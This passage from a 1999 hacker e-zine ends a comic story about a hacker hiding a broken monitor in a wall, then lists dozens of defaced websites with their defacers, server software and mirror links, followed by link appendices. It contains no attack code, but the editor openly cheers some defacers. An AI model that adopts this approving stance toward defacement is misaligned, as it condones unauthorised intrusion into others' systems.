small fire created by the exploding monitor burned down, he realized what he had done. His boss would kill him if he found out! There was only one thing to do... hide the evidence and claim that his monitor had been stolen! Luckily, they were doing some work on the Second floor, and one of the walls was not yet completed. Harold threw the monitor onto a push cart and put a box over it. He knew that no one should be in the building, but just in case. He got to the elevator without anyone seeing him. He pushed the elevator call button and waited for what seemed to be an eternity. Finally the elevator opened. "Hey Harold, how's it going?" FOR PETE'S SAKE! It was security... "Uh, nothing much, just taking this up to 2nd floor to replace a monitor one of the secerataries said had a color problem." It sounded good, good enough. The security guard looked at Harold, for a minute he thought something, Harold looked very white, and was sweating profusely. But then, he was a typical hacker, so that didn't mean anything. "Alright, just be sure to lock the doors behind you..." Harold boarded the elevator and pressed 2. Now that he had passed the security guard, nothing should stand in his way. On the second floor, there was a section of wall that wasn't quite done yet. Harold threw the broken monitor in there, and quickly threw up a piece of drywall and nailed it down. Using skills he had learned from his father, a carpenter, he quickly spread the plaster all around, liberally. He didn't think that anyone would notice that the wall had gotten done early... he ran past one of the secerataries desks and opened the drawers... sure enough, he found a hair dryer. He used the hair dryer to quickly dry the plaster... grabbed a power sander and finished the job. Last but not least he grabbed a vaccuum and sucked up all the dust. "But what is it missing??" Paint. He needed paint, but he couldn't find any. Quickly he found a post it note and scrawled in his best handwriting (the best handwriting for a hacker anyway) 'BOB, I FINISHED THE WALL, COULDN'T FIND PAINT..'. Never mind the fact he didn't know who Bob was, but there was always a Bob working somewhere, so it sounded good. Harold got back on the elevator and made it back to his room safely... he wrote a note to his boss that his monitor had been stolen and went home. The next day Harold came in to work and was greeted by his boss. "Monitor stolen?", his boss questioned him about it. Harold told him that he had left the room unlocked accidently and probably someone from Maintenence took it. He looked as convincing as he could. "Okay" the boss said, "Get one out of storage, I hope you don't mind using an EGA monitor for a while, it's all we've got left..". Doesn't matter, thought Harold, I only use text based OSs anyway. "Oh and by the way, Harold, a seceratary up on the second floor says that he can't see the network, can you look into it?" "Sure, I'll go right up". As Harold boarded the elevator, he thought of how clever he was to get out of trouble. He especially had a big smile on his face when he reached the second floor and saw Maintenence painting that wall. He went over to the secerataries desk and found that the guy's network connection had been removed. No big deal. He went back down the hall, but something stopped him. From behind the wall where he had hid the monitor, he heard a slight and high pitched "Whiiizzzzzzzzz". He thought about it for a moment... but nah... couldn't be... Later that evening as he was about ready to type make zlilo for the 16th time, his boss popped in his office and said, "They're having network problems again, and this time it's not the cable being unplugged...". "Okay, I'll look into it." Harold quickly hit return, and left the room. There is nothing I could have forgotten in the kernel this time, I have everything supported... HAHAHAHA! As he walked past his wall, he again heard the slight, "Whiiizzzzzzzz" from behind the wall. He thought about it for a moment as the security guard walked up... "Funny thing your monitor being stolen... I didn't see anyone but you here all last night!" "Listen, perhaps if you had been doing your job a little better I would still have a monitor!" Harold shouted back. The security guard was taken aback. The whiiizzzz became louder. "What's that noise?" Harold demanded. The security guard looked puzzled. "Harold, you are wierd." the security guard left. Harold continued on to the problem computer. "Why isn't this seeing the network, all the drivers are loading properly!" He checked the connections, he checked the hub, and he even replaced the NIC. As he turned off the computer to reboot, the high pitched whiiizzz became very loud.... "CUT IT OUT!!" Harold shouted. No one could hear him because no one was there. Harold ran to one of the maintenence walls and flipped the breaker to turn off all of the power on that floor. The whiiiizzz noise only became louder. He turned the power back on and grabbed a fire axe from the wall, setting off the fire alarm. But Harold couldn't hear the fire alarm. All he could hear was the Monitor from hell, it's noises raging from behind the wall. He took the axe and chopped down the wall. "DAMN YOU! I WILL KILL YOU ONCE AND FOR ALL!!" The security guard rushed up behind him and startled Harold. "What the hell do you think you are doing??" demanded the security guard. Harold didn't even look at him, he kept chopping at the wall. The security guard was perplexed, so he drew his weapon. "I ORDER YOU TO STOP NOW HAROLD!!". Harold pleaded "I HAVE TO MAKE IT STOP!! I HAVE TO MAKE IT STOP!!" "Make what stop?" "The Monitor, IT WON'T QUIT!! IT IS TRYING TO DRIVE ME INSANE!!". The security guard was speechless and didn't know what to do. Harold kept chopping at the wall. Finally it caved in, Harold climed in the wall and grabbed the monitor. "HAHAHA! I HAVE YOU NOW YOU MONITOR FROM HELL!!!!". That was the last thing Harold said before he discharged the High Voltage area across his hand. The charge went up his arm, and into his brain. Harold colapsed... -epilogue- Harold woke up in the hospital.. still shaken. He didn't know what had happened, the shock had made him forget. After he left the hospital, he went back to work. His boss felt sorry for him and gave him his old job back, but had hired someone to take his place in his abscense. Harold went downstairs to his computer and flicked the switch to turn it on. The computer breathed to life, Harold was pleased to be back where he belonged, in front of a computer. They even fixed his monitor, and he had a brand new 15" SVGA monitor. He turned around to get a can of jolt out of the 'frige and when he turned back, Harold screamed in horror. A scream so loud that it could be heard clear to the 5th floor. For his monitor was displaying something that could not be explained, something that terrified him past all sanity. His monitor was saying "Starting Windows 95...." @HWA SITE.1 http://www.xteq.com/products/xset/ X-Setup windows hacker Cool product (its FREE) for Windows 9x users, this utility Xsetup is similar in function to TweakUI only has a lot more options and also has plugins. Well worth checking out. Site was a little slow I found that downloading from the 'softwareforfree' links was the best bet for thru-put. You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ ___| _ \ | | __| _` |\ \ / | | __| _ \ _` | | | ( | ` < | | | __/ ( | \____|_| \__,_| _/\_\\___/ _| \___|\__,_| Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Start< Defaced domain: www.safeandsecure.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/08/www.safeandsecure.net Defaced by: highkidz Operating System: Linux Date 11/09/99 Defaced domain: www.synrgy.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/08/www.synrgy.com Defaced by: Foam Operating System: Windows NT (IIS/4.0) Date 11/09/99 Defaced domain: www.ntinow.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/08/www.ntinow.com Defaced by: Foam Operating System: Windows NT (IIS/4.0) Date 11/09/99 Defaced domain: biosys.bre.orst.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/biosys.bre.orst.edu Defaced by: Narcissus Operating System: Windows NT (IIS/4.0) Date 11/09/99 Defaced domain: www.inlis.gov.sg Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.inlis.gov.sg Defaced by: Sarin Operating System: Windows NT Date 11/09/99 Defaced domain: www.samofa.gov.sa Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.samofa.gov.sa Defaced by: Sarin Operating System: Windows NT (IIS/4.0) Date 11/09/99 Defaced domain: devens-www.army.mil mirror: attrition.org/mirror/attrition/1999/11/09/devens-www.army.mil Defaced by: unknown Date 11/09/99 Defaced domain: www.rmd.belvoir.army.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.rmd.belvoir.army.mil Defaced by: hV2k Operating System: Windows NT Date 11/09/99 Defaced domain: lickass.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/lickass.net Defaced by: cowhead2000 Operating System: Linux (Apache 1.3.6) Date 11/09/99 Defaced domain: www.timmonsmicro.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.timmonsmicro.com Defaced by: sSh Operating System: Linux (Red Hat) (Apache 1.3.3) Date 11/09/99 Defaced domain: www.aiasp.com.tw Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.aiasp.com.tw Defaced by: DHC Operating System: Windows NT (IIS/4.0) Date 11/09/99 Defaced domain: uranos.rz.uni-osnabrueck.de Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/uranos.rz.uni-osnabrueck.de Defaced by: Narcissus Operating System: Windows NT (Apache 1.3.6 Win32) Date 11/09/99 Defaced domain: www.safeandsecure.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.safeandsecure.net Defaced by: sSh Operating System: Linux (Red Hat) (Apache 1.3.3) Date 11/09/99 Defaced domain: www.cmssoft.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.cmssoft.com Defaced by: w0lf Operating System: Irix (Rapidsite/Apa-1.3.4 FrontPage) Date 11/09/99 Defaced domain: correo.inta.gov.ar Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/correo.inta.gov.ar Defaced by: hacking 4 ponies Operating System: Linux Date 11/09/99 Defaced domain: linukz.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/linukz.net Defaced by: R3dPriest Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6) Date 11/09/99 Defaced domain: w3.pica.army.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/w3.pica.army.mil Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/10/99 Defaced domain: www.omh.state.ny.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.omh.state.ny.us Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/10/99 Defaced domain: www.cbacareer.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.cbacareer.com Defaced by: kryptek Operating System: Solaris 2.5x (Netscape-Enterprise/3.0C) Date 11/10/99 Defaced domain: www.nypa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.nypa.gov Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/10/99 Defaced domain: www.twu.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.twu.ca Defaced by: hackcanada.com Operating System: Windows NT (IIS/4.0) Date 11/10/99 Defaced domain: www.futuresuperstock.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/10/www.futuresuperstock.com Defaced by: Narcissus Operating System: Windows NT (IIS/3.0) Date 11/10/99 Defaced domain: www.soften.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/10/www.soften.com Defaced by: c0ax Operating System: Windows NT Date 11/10/99 Defaced domain: afford2.netc.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/afford2.netc.com Defaced by: hell Operating System: Windows 95 Date 11/11/99 Defaced domain: abraham.eng.buffalo.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/abraham.eng.buffalo.edu Defaced by: section8 Operating System: Windows NT Date 11/11/99 Defaced domain: ceserver.jpl.nasa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/ceserver.jpl.nasa.gov Defaced by: Uneek Technologies Operating System: Windows NT Date 11/11/99 Defaced domain: www.ci.beverly-hills.ca.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.ci.beverly-hills.ca.us Defaced by: kryptek Operating System: Solaris Date 11/11/99 Defaced domain: www.manningham.vic.gov.au Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.manningham.vic.gov.au Defaced by: ned rubenschlachen Operating System: Windows NT Date 11/11/99 Defaced domain: airsar.jpl.nasa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/airsar.jpl.nasa.gov Defaced by: dukj Operating System: Windows NT Date 11/11/99 Defaced domain: www.rucker.amedd.army.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.rucker.amedd.army.mil Defaced by: hV2k Operating System: Windows Nt Date 11/11/99 Defaced domain: www.unitedskins.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.unitedskins.com Defaced by: SunDevil Operating System: Windows NT Date 11/11/99 Defaced domain: www.mda.state.mn.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.mda.state.mn.us Defaced by: hV2k Operating System: Windows NT Date 11/11/99 Defaced domain: www.wgrlc.vic.gov.au Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.wgrlc.vic.gov.au Defaced by: dukj Operating System: Windows NT Date 11/11/99 Defaced domain: www.dcjs.state.va.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.dcjs.state.va.us Defaced by: twd Operating System: Windows NT Date 11/11/99 Defaced domain: www.plebius.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.plebius.org Defaced by: z0z Operating System: Bf Date 11/11/99 Defaced domain: www.palacewizard.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.palacewizard.com Defaced by: kryptek Operating System: Solaris 2.5x (Netscape-Enterprise/2.01c) Date 11/11/99 Defaced domain: www.racquel.eroticvideos.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.racquel.eroticvideos.com Defaced by: kryptek Operating System: Solaris 2.5x (Netscape-Enterprise/2.01c) Date 11/11/99 Defaced domain: corp.jkr.gov.my Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/corp.jkr.gov.my Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 11/11/99 Defaced domain: www.2rotc.army.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.2rotc.army.mil Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/11/99 Defaced domain: www.apa.state.va.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.apa.state.va.us Defaced by: twd Operating System: Windows NT (IIS/4.0) Date 11/11/99 Defaced domain: ene.gov.on.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/ene.gov.on.ca Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 11/11/99 Defaced domain: fmprc.gov.cn Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/fmprc.gov.cn Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 11/11/99 Defaced domain: intra.taipei.gov.tw Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/intra.taipei.gov.tw Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 11/12/99 Defaced domain: www.commercialpro.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.commercialpro.com Defaced by: PHC Operating System: Windows NT (IIS/4.0) Date 11/12/99 Defaced domain: mineco.fgov.be Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/mineco.fgov.be Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 11/12/99 Defaced domain: pyxis.stf.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/pyxis.stf.gov.br Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 11/12/99 Defaced domain: shop.gov.sg Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/shop.gov.sg Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 11/12/99 Defaced domain: shjlib.gov.ae Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/shjlib.gov.ae Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 11/12/99 Defaced domain: www.koko.gov.my Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.koko.gov.my Defaced by: dukj Operating System: Windows NT Date 11/12/99 Defaced domain: www.dewa.gov.ae Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.dewa.gov.ae Defaced by: dukj Operating System: Windows NT Date 11/12/99 Defaced domain: www.do-it-better.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.do-it-better.com Defaced by: Fuby Operating System: Windows NT Date 11/12/99 Defaced domain: www.hyd.gov.hk Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.hyd.gov.hk Defaced by: dukj Operating System: Windows NT Date 11/12/99 Defaced domain: www.aodc.gov.au Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.aodc.gov.au Defaced by: ALOC Operating System: Solaris Date 11/12/99 Defaced domain: athena.infopreneur.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/athena.infopreneur.com Defaced by: Blade Operating System: Windows NT Date 11/12/99 Defaced domain: www.cmiteamwork.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.cmiteamwork.com Defaced by: v00d00 Operating System: Windows NT Date 11/12/99 Defaced domain: www.shssf.edu.tw Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.shssf.edu.tw Defaced by: TREATY Operating System: Solaris Date 11/12/99 Defaced domain: www.hkl.gov.my Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.hkl.gov.my Defaced by: TREATY Operating System: Solaris Date 11/12/99 Defaced domain: caetano.fenorte.uenf.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/caetano.fenorte.uenf.br Defaced by: r4ideN Operating System: Linux (Apache 1.2.4) Date 11/12/99 Defaced domain: fusion.sci.hiroshima-u.ac.jp Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/fusion.sci.hiroshima-u.ac.jp Operating System: Solaris Date 11/13/99 Defaced domain: eo1.gsfc.nasa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/eo1.gsfc.nasa.gov Defaced by: Verb0 Operating System: Windows Nt Date 11/13/99 Defaced domain: www.aptv.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.aptv.org Defaced by: busdr1v3r Operating System: Irix Date 11/13/99 Defaced domain: www.pgj.ma.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.pgj.ma.gov.br Defaced by: NFO Operating System: Windows NT Date 11/14/99 Defaced domain: www.ipem.mg.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.ipem.mg.gov.br Defaced by: NFO Operating System: Windows NT Date 11/14/99 Defaced domain: www.sect.mg.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.sect.mg.gov.br Defaced by: NFO Operating System: Windows NT Date 11/14/99 Defaced domain: www.wnym.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.wnym.com Defaced by: Chaos Crew Operating System: Linux (Netscape-FastTrack/2.01) Date 11/14/99 Defaced domain: www.duqpart.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.duqpart.com Defaced by: Chaos Inc. Operating System: Linux (Netscape-FastTrack/2.01) Date 11/14/99 Defaced domain: www.bengarelick.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.bengarelick.com Defaced by: darkness Operating System: Linux (Netscape-FastTrack/2.01) Date 11/14/99 Defaced domain: www.unitedskins.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.unitedskins.com Defaced by: SunDevil Operating System: Windows NT Date 11/14/99 Defaced domain: www.greenelec.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.greenelec.com Defaced by: wkD Operating System: Linux Date 11/14/99 Defaced domain: www.cwc.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.cwc.gov Defaced by: Coolio Operating System: Linux Date 11/14/99 Defaced domain: www.syokubutu.rika.juen.ac.jp Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.syokubutu.rika.juen.ac.jp Defaced by: DHC Operating System: Windows 95 Date 11/14/99 Defaced domain: www.dare.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.dare.com Defaced by: Coolio Operating System: Irix Date 11/14/99 Defaced domain: www.dairyqueen.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.dairyqueen.com Defaced by: Beyond Operating System: Windows NT Date 11/14/99 Defaced domain: www.hyd.gov.hk Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.hyd.gov.hk Defaced by: Beyond Operating System: Windows NT Date 11/14/99 Defaced domain: www.europa.aichi-edu.ac.jp Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.europa.aichi-edu.ac.jp Defaced by: Code Kings Operating System: Windows 95 Date 11/14/99 Defaced domain: www.acss.com.tw Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.acss.com.tw Defaced by: DHC Operating System: Windows NT Date 11/14/99 Defaced domain: www.trucktrack.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.trucktrack.com Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: www.bjrc.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.bjrc.com Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: www.advancedwireless.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.advancedwireless.com Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: www.spartafoods.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.spartafoods.com Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: www.matept.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.matept.com Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: www.flopz.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.flopz.com Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: www.mncoop.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.mncoop.org Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: www.babybook.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.babybook.net Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: www.microassist.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.microassist.com Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: www.cdcs.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.cdcs.com Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: www.wed.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.wed.com Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Date 11/14/99 Defaced domain: goffstown.lib.nh.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/goffstown.lib.nh.us Defaced by: hacking 4 ponies Operating System: Linux (Apache 1.2.4) Date 11/14/99 Defaced domain: bectraining.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/bectraining.com Defaced by: hacking 4 ponies Operating System: Linux (Apache 1.2.4) Date 11/14/99 Defaced domain: www.adc-electronic.de Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.adc-electronic.de Operating System: Solaris 2.6 - 2.7 (Apache 1.2.6) Date 11/14/99 Defaced domain: hooksett.lib.nh.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/hooksett.lib.nh.us Defaced by: hacking 4 ponies Operating System: Linux (Apache 1.2.4) Date 11/14/99 Defaced domain: seresc.k12.nh.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/seresc.k12.nh.us Defaced by: hacking 4 ponies Operating System: Linux (Apache 1.2.4) Date 11/14/99 Defaced domain: litchfield.k12.nh.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/litchfield.k12.nh.us Defaced by: Hacking 4 Ponies Operating System: Linux (Apache 1.2.4) Date 11/14/99 Defaced domain: www.7thheaven.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.7thheaven.org Defaced by: NitrOBurN Operating System: Linux (Apache 1.3.4) Date 11/14/99 Defaced domain: www.mv2000.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.mv2000.com Defaced by: darkness Operating System: Linux (Apache 1.3.6) Date 11/14/99 Defaced domain: www.bellcity.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.bellcity.net Defaced by: darkness Operating System: Linux (Apache 1.3.6) Date 11/14/99 Defaced domain: www.ntia.doc.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.ntia.doc.gov Defaced by: Comdext0r Operating System: Windows NT (WebSitePro/1.1f) Date 11/14/99 Defaced domain: www.clearvista.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.clearvista.com Defaced by: spinkus Operating System: Windows NT (IIS/4.0) Date 11/14/99 and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://securax.org/cum/ *New address* Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]